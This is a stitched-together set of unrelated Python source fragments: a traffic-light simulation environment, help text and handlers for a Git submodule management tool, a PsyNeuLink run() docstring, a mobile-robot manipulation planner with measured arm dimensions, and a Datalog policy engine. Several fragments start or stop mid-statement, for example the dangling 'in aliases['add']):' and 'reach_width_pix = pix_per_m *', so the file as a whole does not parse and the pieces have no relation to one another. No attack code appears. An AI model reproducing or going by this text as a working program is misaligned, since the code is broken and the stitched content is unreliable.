print "Environment.step(): Primary agent ran out of time! Trial aborted."
self.t += 1
def sense(self, agent):
""" This function is called when information is requested about the sensor
inputs from an 'agent' in the environment. """
assert agent in self.agent_states, "Unknown agent!"
state = self.agent_states[agent]
location = state['location']
heading = state['heading']
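# Light state True means the north-south direction is open: agents whose heading
# has a non-zero y component (heading[1] != 0) see green, while a False state
# opens the east-west direction (heading[0] != 0).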
light = 'green' if (self.intersections[location].state and heading[1] != 0) or ((not self.intersections[location].state) and heading[0] != 0) else 'red'
# Populate oncoming, left, right
oncoming = None
left = None
right = None
for other_agent, other_state in self.agent_states.iteritems():
if agent == other_agent or location != other_state['location'] or (heading[0] == other_state['heading'][0] and heading[1] == other_state['heading'][1]):
continue
# For dummy agents, ignore the primary agent
# This is because the primary agent is not required to follow the waypoint
if other_agent == self.primary_agent:
continue
other_heading = other_agent.get_next_waypoint()
if (heading[0] * other_state['heading'][0] + heading[1] * other_state['heading'][1]) == -1:
if oncoming != 'left': # we don't want to override oncoming == 'left'
oncoming = other_heading
elif (heading[1] == other_state['heading'][0] and -heading[0] == other_state['heading'][1]):
if right != 'forward' and right != 'left': # we don't want to override right == 'forward' or 'left'
right = other_heading
else:
if left != 'forward': # we don't want to override left == 'forward'
left = other_heading
return {'light': light, 'oncoming': oncoming, 'left': left, 'right': right}
def get_deadline(self, agent):
""" Returns the deadline remaining for an agent. """
return self.agent_states[agent]['deadline'] if agent is self.primary_agent else None
def act(self, agent, action):
""" Consider an action and perform the action if it is legal.
Receive a reward for the agent based on traffic laws. """
assert agent in self.agent_states, "Unknown agent!"
assert action in self.valid_actions, "Invalid action!"
state = self.agent_states[agent]
location = state['location']
heading = state['heading']
light = 'green' if (self.intersections[location].state and heading[1] != 0) or ((not self.intersections[location].state) and heading[0] != 0) else 'red'
inputs = self.sense(agent)
# Assess whether the agent can move based on the action chosen.
# Either the action is okay to perform, or falls under 4 types of violations:
# 0: Action okay
# 1: Minor traffic violation
# 2: Major traffic violation
# 3: Minor traffic violation causing an accident
in aliases['add']):
print(
"PARAMETERS list of local paths to Git repositories. No effect if"
" no path is given."
)
print(
"EFFECT updates the description file to include each path so that"
" it matches their current state."
)
print(
"EXAMPLE 'add ./my/src/local_clone' adds a description of the"
" repository at ./my/src/local_clone to the description file."
)
print("ALIASES " + ', '.join(aliases['add']) + ".")
return
if (command in aliases['foreach']):
print(
"PARAMETERS list of local paths to Git repositories and a shell"
" command to execute as last parameter. All entries from the"
" description file if no path is given."
)
print(
"EFFECT executes the shell command for each submodule. The command"
" is executed from the parent repository and a number of"
" environment variables are declared for each execution, as"
" described below (according to what is in the description file):"
)
print("ENVVAR SNSM_COMMIT is the commit for this submodule.")
print(
"ENVVAR SNSM_ENABLED is 1 if the submodule is enabled, 0 otherwise."
)
print(
"ENVVAR SNSM_SOURCES is a newline separated list of anonymous"
" sources for the submodule."
)
print(
"ENVVAR SNSM_NAMED_SOURCES is a newline separated list of named"
" sources for the submodule. Each entry is first the name, a space,"
" then the source."
)
print(
"ENVVAR SNSM_TARGET_TYPE is the target type for this submodule."
" 'commit', 'branch', and 'tag' are all 3 possible values."
)
print(
"ENVVAR SNSM_TARGET is the actual target for this submodule."
" It is equal to SNSM_COMMIT if SNSM_TARGET_TYPE is 'commit'."
)
print(
"ENVVAR SNSM_TARGET_OVERRIDES_COMMIT is 1 if the submodule is"
" configured to use the target instead of the commit, 0 otherwise."
)
print("ENVVAR SNSM_ROOT is an absolute path to the root repository.")
print("ENVVAR SNSM_ABSOLUTE_PATH is an absolute path to the submodule.")
print(
"ENVVAR SNSM_PATH is a path to the submodule relative to the"
" direct parent repository."
)
print(
"ENVVAR SNSM_PARENT is an absolute path to the direct parent"
" repository."
)
print(
"ENVVAR SNSM_PARENTS is a newline separated list of absolute path"
" to each of the parent repositories."
)
print("EXAMPLE foreach ./my/src/local_clone \"echo $SNSM_PATH\"")
print("ALIASES " + ', '.join(aliases['foreach']) + ".")
return
if (command in aliases['foreach-enabled']):
print(
"PARAMETERS list of local paths to Git repositories and a shell"
" command to execute as last parameter. All entries from the"
" description file if no path is given."
)
print(
"EFFECT executes the shell command for each submodule, provided"
" they are enabled. See 'help foreach' for more details."
)
print(
"EXAMPLE foreach-enabled ./my/src/local_clone \"echo $SNSM_PATH\""
)
print("ALIASES " + ', '.join(aliases['foreach-enabled']) + ".")
return
if (command in aliases['foreach-enabled-recursive']):
print(
"PARAMETERS list of local paths to Git repositories and a shell"
" command to execute as last parameter. All entries from the"
" description file if no path is given."
)
print(
"EFFECT executes the shell command for each submodule, provided"
" they are enabled. The execution recurses into each such"
" submodule. See 'help foreach' for more details."
)
print(
"EXAMPLE foreach-enabled-recursive ./my/src/local_clone"
" \"echo $SNSM_PATH\""
)
print(
"ALIASES " + ', '.join(aliases['foreach-enabled-recursive']) + "."
)
return
if (command in aliases['foreach-recursive']):
print(
"PARAMETERS list of local paths to Git repositories and a shell"
" command to execute as last parameter. All entries from the"
" descriptionfile if no path is given."
)
print(
"EFFECT executes the shell command for each submodule. The"
" execution recurses into each submodule. See 'help foreach' for"
" more details."
)
print(
"EXAMPLE foreach-recursive ./my/src/local_clone \"echo $SNSM_PATH\""
)
print("ALIASES " + ', '.join(aliases['foreach-recursive']) + ".")
return
if (command in aliases['from-official']):
# TODO
print("EXAMPLE from-official ./my/official/gitsubmodule")
print("ALIASES " + ', '.join(aliases['from-official']) + ".")
return
if (command in aliases['list']):
print(
"PARAMETERS list of local paths. The root repository's path is"
" selected if no path is given"
)
print("EFFECT lists all submodules in those directories.")
print("EXAMPLE list")
print("EXAMPLE list ./my")
print("EXAMPLE list ./my my_other_folder")
print("ALIASES " + ', '.join(aliases['list']) + ".")
return
if (command in aliases['match-target']):
print(
"PARAMETERS list of paths to submodules. All described submodules"
" are selected if no path is given."
)
print(
"EFFECT updates the submodule's local copy to match the"
" submodule's target (instead of its commit) regardless of the"
" 'target_overrides_commit' parameter, then updates the submodule's"
" description so that it matches the updated local copy."
)
print("EXAMPLE match-target")
print("EXAMPLE match-target ./*")
print("EXAMPLE match-target ./my/src/local_clone")
print("ALIASES " + ', '.join(aliases['match-target']) + ".")
return
if (command in aliases['rm']):
# TODO
print("EXAMPLE remove ./my/src/local_clone")
print("ALIASES " + ', '.join(aliases['rm']) + ".")
return
if (command in aliases['rm-desc']):
# TODO
print("EXAMPLE remove-description ./my/src/local_clone")
print("ALIASES " + ', '.join(aliases['rm-desc']) + ".")
return
if (command in aliases['rm-dir']):
# TODO
print("EXAMPLE remove-description ./my/src/local_clone")
print("ALIASES " + ', '.join(aliases['rm-dir']) + ".")
return
if (command in aliases['seek']):
# TODO
print("EXAMPLE seek /my/src/")
print("ALIASES " + ', '.join(aliases['seek']) + ".")
return
if (command in aliases['status']):
# TODO
print("EXAMPLE status /my/src/local_clone")
print("ALIASES " + ', '.join(aliases['status']) + ".")
return
if (command in aliases['to-official']):
# TODO
print("EXAMPLE to-official /my/src/local_clone")
print("ALIASES " + ', '.join(aliases['to-official']) + ".")
return
if (command in aliases['up-desc']):
# TODO
print("EXAMPLE update-description /my/src/local_clone")
print("ALIASES " + ', '.join(aliases['up-desc']) + ".")
return
if (command in aliases['up-dir']):
# TODO
print("EXAMPLE update-directory /my/src/local_clone")
print("ALIASES " + ', '.join(aliases['up-dir']) + ".")
return
print("[F] Unknown command \"" + command + "\".", file = sys.stderr)
handle_generic_help(invocation)
sys.exit(-1)
################################################################################
##### ADD ######################################################################
################################################################################
def handle_add_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
for path in paths:
if (path not in submodule_dictionary):
new_module = GitSubmodule(path)
submodule_dictionary[path] = new_module
submodule_list.append(new_module)
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
apply_update_desc_to(submodule_dictionary, root_directory)
update_submodules_desc_file(root_directory, submodule_dictionary, [])
print("Updated description written.")
git_add_to_gitignore(
set([path for path in submodule_dictionary]),
root_directory
)
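# Example (hypothetical paths): running `add ./lib/foo ./lib/bar` from anywhere
# inside the repository resolves both paths against the Git root, records their
# current state in the description file, and adds them to .gitignore.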
################################################################################
##### FOREACH ##################################################################
################################################################################
def handle_foreach_command (parameters, is_recursive, is_enabled_only):
if (len(parameters) == 0):
print(
"[F] This command requires at least one parameter.",
file = sys.stderr
)
handle_help_command(sys.argv[0], [sys.argv[1]])
sys.exit(-1)
foreach_command = parameters.pop()
paths = parameters
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
apply_foreach_to(
submodule_dictionary,
is_recursive,
is_enabled_only,
[root_directory], # = traversed_submodules
foreach_command,
root_directory
)
################################################################################
##### FROM OFFICIAL ############################################################
################################################################################
def handle_from_official_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
if (len(paths) == 0):
print("Shallow initialization of all Official Git Submodules...")
git_shallow_submodule_init(root_directory, ".")
print("Done.")
paths = git_get_official_submodule_paths(root_directory)
else:
for path in paths:
print(
"Shallow Official Git Submodule initialization for \""
+ path
+ "\"..."
)
git_shallow_submodule_init(root_directory, path)
print("Done.")
if (path not in git_get_official_submodule_paths(root_directory)):
print(
"[F] No Official Git Submodule registered at \""
+ path
+ "\".",
file = sys.stderr
)
sys.exit(-1)
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
for path in paths:
if (path not in submodule_dictionary):
new_module = GitSubmodule(path)
submodule_dictionary[path] = new_module
submodule_list.append(new_module)
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
apply_update_desc_to(submodule_dictionary, root_directory)
update_submodules_desc_file(root_directory, submodule_dictionary, [])
print("Updated description written.")
git_add_to_gitignore(
set([path for path in submodule_dictionary]),
root_directory
)
################################################################################
##### REMOVE ###################################################################
################################################################################
def handle_remove_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
if (len(paths) == 0):
paths = [path for path in submodule_dictionary]
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
update_submodules_desc_file(root_directory, dict(), paths)
apply_clear_to(submodule_dictionary, root_directory)
git_remove_from_gitignore(paths, root_directory)
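# Note: 'remove' combines the two handlers below: it drops the entries from the
# description file and .gitignore (like 'remove-description') and clears the
# checked-out directories (like 'remove-directory').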
################################################################################
##### REMOVE DESCRIPTION #######################################################
################################################################################
def handle_remove_description_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
if (len(paths) == 0):
paths = [path for path in submodule_dictionary]
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
update_submodules_desc_file(root_directory, dict(), paths)
git_remove_from_gitignore(paths, root_directory)
################################################################################
##### REMOVE DIRECTORY #########################################################
################################################################################
def handle_remove_directory_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
(submodule_list, submodule_dictionary) = get_submodules_of(root_directory)
if (len(paths) == 0):
paths = [path for path in submodule_dictionary]
paths = [
resolve_relative_path(
root_directory,
current_directory,
path.rstrip(os.sep)
) for path in paths
]
submodule_dictionary = restrict_dictionary_to(submodule_dictionary, paths)
apply_clear_to(submodule_dictionary, root_directory)
################################################################################
##### SEEK #####################################################################
################################################################################
def handle_seek_command (paths):
current_directory = os.getcwd()
root_directory = git_find_root_path()
`INPUT` Node is used as its input on `TRIAL <TimeScale.TRIAL>`
num_trials : int : default 1
typically, the composition will infer the number of trials from the length of its input specification.
To reuse the same inputs across many trials, you may specify an input dictionary with lists of length 1,
or use default inputs, and select a number of trials with num_trials.
initialize_cycle_values : Dict { Node: Node Value } : default None
sets the value of specified `Nodes <Composition_Nodes>` before the start of the run. All specified
Nodes must be in a `cycle <Composition_Graph>` (i.e., designated with `NodeRole` `CYCLE
<NodeRoles.CYCLE>`; otherwise, a warning is issued and the specification is ignored). If a Node in
a cycle is not specified, it is assigned its `default values <Parameter_Defaults>` when initialized
(see `Composition_Cycles_and_Feedback` for additional details).
reset_stateful_functions_to : Dict { Node : Object | iterable [Object] } : default None
object or iterable of objects to be passed as arguments to nodes' reset methods when their
respective reset_stateful_function_when conditions are met. These are used to seed the stateful attributes
of Mechanisms that have stateful functions. If a node's reset_stateful_function_when condition is set to
Never, but they are listed in the reset_stateful_functions_to dict, then they will be reset once at the
beginning of the run, using the provided values. For a more in depth explanation of this argument, see
`Resetting Parameters of StatefulFunctions <Composition_Reset>`.
reset_stateful_functions_when : Dict { Node: Condition } | Condition : default Never()
if type is dict, sets the reset_stateful_function_when attribute for each key Node to its corresponding value
Condition. if type is Condition, sets the reset_stateful_function_when attribute for all nodes in the
Composition that currently have their reset_stateful_function_when conditions set to `Never <Never>`.
in either case, the specified Conditions persist only for the duration of the run, after which the nodes'
reset_stateful_functions_when attributes are returned to their previous Conditions. For a more in depth
explanation of this argument, see `Resetting Parameters of StatefulFunctions <Composition_Reset>`.
skip_initialization : bool : default False
clamp_input : enum.Enum[SOFT_CLAMP|HARD_CLAMP|PULSE_CLAMP|NO_CLAMP] : default SOFT_CLAMP
specifies how inputs are handled for the Composition's `INPUT` `Nodes <Composition_Nodes>`.
COMMENT:
BETTER DESCRIPTION NEEDED
COMMENT
runtime_params : Dict[Node: Dict[Parameter: Tuple(Value, Condition)]] : default None
nested dictionary of (value, `Condition`) tuples for parameters of Nodes (`Mechanisms <Mechanism>` or
`Compositions <Composition>` of the Composition; specifies alternate parameter values to be used only
during this `RUN` when the specified `Condition` is met (see `Composition_Runtime_Params` for
additional information).
call_before_time_step : callable : default None
specifies function to call before each `TIME_STEP` is executed.
call_after_time_step : callable : default None
specifies function to call after each `TIME_STEP` is executed.
call_before_pass : callable : default None
specifies function to call before each `PASS` is executed.
call_after_pass : callable : default None
specifies function to call after each `PASS` is executed.
call_before_trial : callable : default None
specifies function to call before each `TRIAL <TimeScale.TRIAL>` is executed.
call_after_trial : callable : default None
specifies function to call after each `TRIAL <TimeScale.TRIAL>` is executed.
termination_processing : Condition : default None
specifies `Condition` under which execution of the run will occur.
COMMENT:
BETTER DESCRIPTION NEEDED
COMMENT
skip_analyze_graph : bool : default False
setting to True suppresses call to _analyze_graph()
COMMENT:
BETTER DESCRIPTION NEEDED
COMMENT
animate : dict or bool : default False
specifies use of the `show_graph <ShowGraph.show_graph>` method to generate a gif movie showing the
sequence of Components executed in a run (see `example <BasicsAndPrimer_Stroop_Example_Animation_Figure>`).
A dict can be specified containing options to pass to the `show_graph <ShowGraph.show_graph>` method;
each key must be a legal argument for the `show_graph <ShowGraph.show_graph>` method, and its value a
specification for that argument. The entries listed below can also be included in the dict to specify
parameters of the animation. If the **animate** argument is specified simply as `True`, defaults are
used for all arguments of `show_graph <ShowGraph.show_graph>` and the options below:
* *UNIT*: *EXECUTION_SET* or *COMPONENT* (default=\\ *EXECUTION_SET*\\ ) -- specifies which Components
to treat as active in each call to `show_graph <ShowGraph.show_graph>`. *COMPONENT* generates an
image for the execution of each Component. *EXECUTION_SET* generates an image for each `execution_set
<Component.execution_sets>`, showing all of the Components in that set as active.
* *DURATION*: float (default=0.75) -- specifies the duration (in seconds) of each image in the movie.
* *NUM_RUNS*: int (default=1) -- specifies the number of runs to animate; by default, this is 1.
If the number specified is less than the total number of runs executed, only the number specified
are animated; if it is greater than the number of runs being executed, only the number being run are
animated.
* *NUM_TRIALS*: int (default=1) -- specifies the number of trials to animate; by default, this is 1.
If the number specified is less than the total number of trials being run, only the number specified
are animated; if it is greater than the number of trials being run, only the number being run are
animated.
* *MOVIE_DIR*: str (default=project root dir) -- specifies the directory to be used for the movie file;
by default a subdirectory of <root_dir>/show_graph_OUTPUT/GIFS is created using the `name
<Composition.name>` of the `Composition`, and the gif files are stored there.
* *MOVIE_NAME*: str (default=\\ `name <Composition.name>` + 'movie') -- specifies the name to be used
for the movie file; it is automatically appended with '.gif'.
* *SAVE_IMAGES*: bool (default=\\ `False`\\ ) -- specifies whether to save each of the images used to
construct the animation in separate gif files, in addition to the file containing the animation.
* *SHOW*: bool (default=\\ `False`\\ ) -- specifies whether to show the animation after it is
constructed, using the OS's default viewer.
log : bool, LogCondition : default False
Sets the `log_condition <Parameter.log_condition>` for every primary `node <Composition.nodes>` and
`projection <Composition.projections>` in the Composition, if it is not already set.
.. note::
as when setting the `log_condition <Parameter.log_condition>` directly, a value of `True` will
correspond to the `EXECUTION` `LogCondition <LogCondition.EXECUTION>`.
scheduler : Scheduler : default None
the scheduler object that owns the conditions that will instruct the execution of the Composition.
If not specified, the Composition will use its automatically generated scheduler.
bin_execute : bool or enum.Enum[LLVM|LLVMexec|LLVMRun|Python|PTXExec|PTXRun] : default Python
specifies whether to run using the Python interpreter or a `compiled mode <Composition_Compilation>`.
False is the same as ``Python``; True tries LLVM compilation modes, in order of power, progressively
reverting to less powerful modes (in the order of the options listed), and to Python if no compilation
mode succeeds (see `Composition_Compilation` for explanation of modes). PTX modes are used for
CUDA compilation.
context : `execution_id <Context.execution_id>` : default `default_execution_id`
context in which the `Composition` will be executed; set to self.default_execution_id if unspecified.
base_context : `execution_id <Context.execution_id>` : Context(execution_id=None)
the context corresponding to the execution context from which this execution will be initialized,
if values currently do not exist for **context**
COMMENT:
REPLACE WITH EVC/OCM EXAMPLE
Examples
--------
This figure shows an animation of the Composition in the XXX example script, with
the `show_graph <ShowGraph.show_graph>` **show_learning** argument specified as *ALL*:
.. _Composition_XXX_movie:
.. figure:: _static/XXX_movie.gif
:alt: Animation of Composition in XXX example script
:scale: 50 %
This figure shows an animation of the Composition in the XXX example script, with the `show_graph
<ShowGraph.show_graph>` **show_control** argument specified as *ALL* and *UNIT* specified as *EXECUTION_SET*:
.. _Composition_XXX_movie:
.. figure:: _static/XXX_movie.gif
:alt: Animation of Composition in XXX example script
:scale: 150 %
COMMENT
Returns
---------
2d list of values of OUTPUT Nodes at end of last trial : list[list]
each item in the list is the `output_values <Mechanism_Base.output_values>` for an `OUTPUT` `Node
<Composition_Nodes>` of the Composition, listed in the order listed in `get_nodes_by_role
<Composition.get_nodes_by_role>`\(`NodeRole.OUTPUT <OUTPUT>`).
.. note::
The `results <Composition.results>` attribute of the Composition contains a list of the outputs for all
trials.
"""
context.source
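# A minimal sketch of calling run() as described in the docstring above, assuming
# a recent PsyNeuLink release (the names `A` and `comp` are hypothetical and not
# taken from this codebase):
import psyneulink as pnl
A = pnl.TransferMechanism(name='A')
comp = pnl.Composition(name='comp')
comp.add_node(A)
results = comp.run(inputs={A: [[1.0]]}, num_trials=3)  # length-1 input lists are reused on every trial
print(comp.results)  # output_values of the OUTPUT Nodes for all trials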
np.array([p0[0], p0[1], 0.0, 1.0])
p0 = np.matmul(image_to_points_mat, p0)[:2]
p1 = np.array([p1[0], p1[1], 0.0, 1.0])
p1 = np.matmul(image_to_points_mat, p1)[:2]
normal = np.array([normal[0], normal[1], 0.0, 0.0])
normal = np.matmul(image_to_points_mat, normal)[:2]
return p0, p1, normal
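# Note on the transform above: points are lifted to homogeneous coordinates with
# w = 1.0 so the 4x4 matrix applies both rotation and translation to them, while
# the normal uses w = 0.0 so it is only rotated (direction vectors are not
# translated); the z and w components are then dropped with [:2].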
def update(self, point_cloud_msg, tf2_buffer):
self.max_height_im.clear()
cloud_time = point_cloud_msg.header.stamp
cloud_frame = point_cloud_msg.header.frame_id
point_cloud = rn.numpify(point_cloud_msg)
only_xyz = False
if only_xyz:
xyz = rn.point_cloud2.get_xyz_points(point_cloud)
self.max_height_im.from_points_with_tf2(xyz, cloud_frame, tf2_buffer)
else:
rgb_points = rn.point_cloud2.split_rgb_field(point_cloud)
self.max_height_im.from_rgb_points_with_tf2(rgb_points, cloud_frame, tf2_buffer)
obstacle_im = self.max_height_im.image == 0
self.updated = True
def save_scan(self, filename):
# Save the new scan to disk.
self.max_height_im.save(filename)
def publish_visualizations(self, voi_marker_pub, point_cloud_pub):
marker = self.voi.get_ros_marker(duration=1000.0)
voi_marker_pub.publish(marker)
point_cloud = self.max_height_im.to_point_cloud()
point_cloud_pub.publish(point_cloud)
class PlanarRobotModel:
def __init__(self):
##################################################################
# PLANAR MODEL OF THE ROBOT
# NOTE: see navigation_planning.py for related
# values. Eventually, these should be unified into a yaml
# file, potentially with some values determined by the
# calibrated URDF.
# The heights should be measured when the arm is fully extended
# and raised. Ideally, there would also be a payload model that
# considers deflection due to a payload.
# -----
# GRIPPER AND ARM
#
# This is a model of the gripper and arm extending. It is for when
# the gripper is rotated so that it is almost straight out. The
# gripper should be rotated a little toward the back of the robot,
# so that the gripper fingers are within the width of the wrist
# while the arm is being extended. This should also bring the
# farthest point of the gripper close to the center of the wrist
# width, which enables it to fit better within a circular
# collision model. In general, this gripper pose should reduce the
# swept volume while the arm extends.
# 0.15 : distance from the side of the most proximal moving cuff to the
# side of the gripper when closed and extended straight out
# 0.14 : distance from the side of the wrist yaw cylinder to the
# side of the most proximal moving cuff
self.gripper_and_arm_width_m = 0.14 # USED FOR PLANNING: 14cm reasonable for Guthrie 1
self.diameter_of_yaw_cylinder_m = 0.045
#self.radius_of_yaw_cylinder_m = 0.0225 # USED FOR PLANNING
self.radius_of_yaw_cylinder_m = 0.022 # USED FOR PLANNING: 2.2cm using calipers for Guthrie 1
# safety margins for the arm extension
self.gripper_and_arm_width_safety_margin_m = 0.01 # USED FOR PLANNING
# distance forward from the center of the wrist yaw cylinder to
# the center of the fingertips
self.yaw_to_fingertips_m = 0.22 # USED FOR PLANNING: 22cm for Guthrie 1
# -----
# GRIPPER
#
# planar length from the center of the wrist's yaw axis to the
# gripper's fingers when about halfway closed
self.gripper_length_m = 0.26
# maximum width of the gripper fingers at the wrist, which is
# twice the distance from the edge of the servo holder to the
# center of the yaw axis cylinder (note that this width is with
# respect to the yaw axis cylinder and hence doesn't represent the
# asymmetry due to the servo being on one side of the gripper
# thereby increasing the width substantially)
self.max_gripper_width_at_wrist_m = 0.1
# maximum gripper width along the fingers when it is closed so the
# fingertips are just touching each other, the measurement is made
# where the metal bows out
self.max_gripper_width_at_fingers_m = 0.075
# distance from the ground to the bottom of the most proximal part
# of the gripper at the wrist yaw joint (i.e., where the actuator
# is) when the arm is raised and extended without a payload
self.max_gripper_height_at_wrist_m = 1.015 # 1.03 when retracted
# distance from the ground to the bottom of the gripper's
# fingertips when the arm is fully raised and fully
# extended without a payload
#self.max_gripper_height_at_fingers_m = 0.9 # USED FOR PLANNING
self.max_gripper_height_at_fingers_m = 1.09 # USED FOR PLANNING: 1.09 with tape measure for Guthrie 1 (safety margin for other robots? what if the arm or mast are tilted?)
# distance from the ground to the bottom of the gripper's
# fingertips when the arm is lowered and extended without a
# payload
self.min_gripper_height_at_fingers_m = 0.0
# -----
# ARM
#
# distance from the outer edge of the yaw axis cylinder to the
# edge of the most proximal moving arm cuff
self.max_arm_width_m = 0.14
# distance from the ground to the bottom of the yaw axis cylinder
self.max_arm_height_m = 1.08
# measured from the exterior of the most proximal cuff to the
# interior of the wrist cuff when fully extended
# Ella: actually measured 0.51, but want to be conservative
self.max_arm_travel_m = 0.5 # USED FOR PLANNING: about 51.25cm with Guthrie 1 (so using 0.5 for safety)
# the height of the arm above the ground when the lift is at 0.0
# -----
# MOBILE BASE
#
# distance from the center of the laser range finder to the outer
# edge of the wrist when retracted
self.min_mobile_base_radius_m = 0.21
# distance from the center of the laser range finder to the back
# of the robot (does not include cables for tethering)
self.max_mobile_base_radius_m = 0.27
# radius of the circumscribing circle of the mobile base,
# currently defined by the distance to the right corner and the
# back center of the robot (does not include cables for tethering)
self.mobile_base_circumscribed_radius_m = 0.21
# mobile base origin with respect to the yaw axis of the fully
# retracted arm
#self.yaw_axis_to_origin_length_m = 0.035 # USED FOR PLANNING
self.yaw_axis_to_origin_length_m = 0.025 # USED FOR PLANNING 2.5cm with hacky measurements on Guthrie 1 (ask Blaine to look on CAD model)
#self.yaw_axis_to_origin_left_m = 0.0165 # USED FOR PLANNING
self.yaw_axis_to_origin_left_m = 0.015 # USED FOR PLANNING: 1.5cm using tape measure with Guthrie 1
# mobile base origin with respect to the center of the circle that
# circumscribes the mobile base
self.circumscribed_to_origin_m = 0.072
##################################################################
class ManipulationPlanner:
def __init__(self):
self.planar_model = PlanarRobotModel()
# Region around the target over which collisions are ignored
self.target_safe_radius_m = 0.1 # ignore 10cm radius around the target when reaching
def base_pose(self, max_height_image, target_xyz_pix, robot_xya_pix, image_display_on=False):
robot_xy_pix = np.int64(np.round(robot_xya_pix[:2]))
robot_ang_rad = robot_xya_pix[2]
robot_x_pix, robot_y_pix = robot_xy_pix
target_x, target_y, target_z = target_xyz_pix
image = max_height_image.image
m_per_height_unit = max_height_image.m_per_height_unit
m_per_pix = max_height_image.m_per_pix
pix_per_m = 1.0 / m_per_pix
# The maximum height of the bottoms of the fingers at full
# extension. This should represent the worst case for the fingers
# moving above objects without collisions.
max_finger_height_m = self.planar_model.max_gripper_height_at_fingers_m
max_finger_height_pix = max_finger_height_m / m_per_height_unit
target_z_m = target_z * m_per_height_unit
if target_z_m > self.planar_model.max_gripper_height_at_fingers_m:
print('Target is too high for the fingertips to reach, so planning to reach as high as possible.')
target_z_m = self.planar_model.max_gripper_height_at_fingers_m
target_z_pix = target_z_m / m_per_height_unit
# Anything taller than the target height will be considered an
# obstacle. If this fails to find a solution, then a plan that
# moves slightly above the target and then descends at the end
# could be tried.
finger_obstacle_image = np.zeros_like(image)
finger_obstacle_image[image > target_z_pix] = 255
# Remove obstacles over a small area surrounding the target. For
# example, the target might be a switch on a wall or a tall can
# with which contact is allowed. The target location may not be
# outside the perceived extent of the target object.
target_safe_radius_pix = int(round(pix_per_m * self.target_safe_radius_m))
cv2.circle(finger_obstacle_image, (target_x, target_y), target_safe_radius_pix, 0, -1)
h, w = image.shape
# Estimate where the robot can navigate given its current pose
# and and the map.
distance_map, traversable_mask = sm.process_max_height_image(max_height_image, robot_x_pix, robot_y_pix, robot_ang_rad, display_on = False)
# Dilate finger obstacles to account for the gripper and arm
# widths. This should also reduce issues due to undersampling by
# the radial search.
reach_width_m = self.planar_model.gripper_and_arm_width_m + (2.0 * self.planar_model.gripper_and_arm_width_safety_margin_m)
reach_width_pix = pix_per_m *
None
delta_abbr = None
if name is not None:
db_name = name + "Database"
delta_name = name + "Delta"
if abbr is not None:
db_abbr = abbr + "DB"
delta_abbr = abbr + "Dlta"
self.database = Database(name=db_name, abbr=db_abbr)
# rules that dictate how database changes in response to events
self.delta_rules = DeltaRuleTheory(name=delta_name, abbr=delta_abbr)
def set_tracer(self, tracer):
self.tracer = tracer
self.database.tracer = tracer
self.delta_rules.tracer = tracer
############### External Interface ###############
# SELECT is handled by TopDownTheory
def insert(self, formula):
return self.update([Event(formula=formula, insert=True)])
def delete(self, formula):
return self.update([Event(formula=formula, insert=False)])
def update(self, events):
"""Apply inserts/deletes described by EVENTS and return changes.
Does not check if EVENTS would cause errors.
"""
for event in events:
assert compile.is_datalog(event.formula), \
"Non-formula not allowed: {}".format(str(event.formula))
self.enqueue_with_included(event)
changes = self.process_queue()
return changes
def update_would_cause_errors(self, events):
"""Return a list of compile.CongressException if we were
to apply the events EVENTS to the current policy.
"""
self.log(None, "update_would_cause_errors " + iterstr(events))
errors = []
current = set(self.policy()) # copy so can modify and discard
# compute new rule set
for event in events:
assert compile.is_datalog(event.formula), \
"update_would_cause_errors operates only on objects"
self.log(None, "Updating {}".format(event.formula))
if event.formula.is_atom():
errors.extend(compile.fact_errors(event.formula))
else:
errors.extend(compile.rule_errors(event.formula))
if event.insert:
current.add(event.formula)
elif event.formula in current:
current.remove(event.formula)
# check for stratified
if not compile.is_stratified(current):
errors.append(compile.CongressException(
"Rules are not stratified"))
return errors
def explain(self, query, tablenames, find_all):
"""Returns None if QUERY is False in theory. Otherwise returns
a list of proofs that QUERY is true.
"""
assert compile.is_atom(query), "Explain requires an atom"
# ignoring TABLENAMES and FIND_ALL
# except that we return the proper type.
proof = self.explain_aux(query, 0)
if proof is None:
return None
else:
return [proof]
def policy(self):
return self.delta_rules.policy()
def get_arity_self(self, tablename):
result = self.database.get_arity_self(tablename)
if result:
return result
return self.delta_rules.get_arity_self(tablename)
############### Interface implementation ###############
def explain_aux(self, query, depth):
self.log(query.table, "Explaining {}".format(str(query)), depth)
# Bail out on negated literals. Need different
# algorithm b/c we need to introduce quantifiers.
if query.is_negated():
return Proof(query, [])
# grab first local proof, since they're all equally good
localproofs = self.database.explain(query)
if localproofs is None:
return None
if len(localproofs) == 0: # base fact
return Proof(query, [])
localproof = localproofs[0]
rule_instance = localproof.rule.plug(localproof.binding)
subproofs = []
for lit in rule_instance.body:
subproof = self.explain_aux(lit, depth + 1)
if subproof is None:
return None
subproofs.append(subproof)
return Proof(query, subproofs)
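# Sketch of the recursion above with hypothetical facts: to explain p(1) derived
# by the rule  p(x) :- q(x), r(x),  the database returns a local proof whose rule
# instance is  p(1) :- q(1), r(1);  explain_aux then recurses on q(1) and r(1),
# each of which bottoms out in a base fact and becomes a leaf Proof node.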
def modify(self, event):
"""Modifies contents of theory to insert/delete FORMULA.
Returns True iff the theory changed.
"""
self.log(None, "Materialized.modify")
self.enqueue_with_included(event)
changes = self.process_queue()
self.log(event.formula.tablename(),
"modify returns {}".format(iterstr(changes)))
return changes
def enqueue_with_included(self, event):
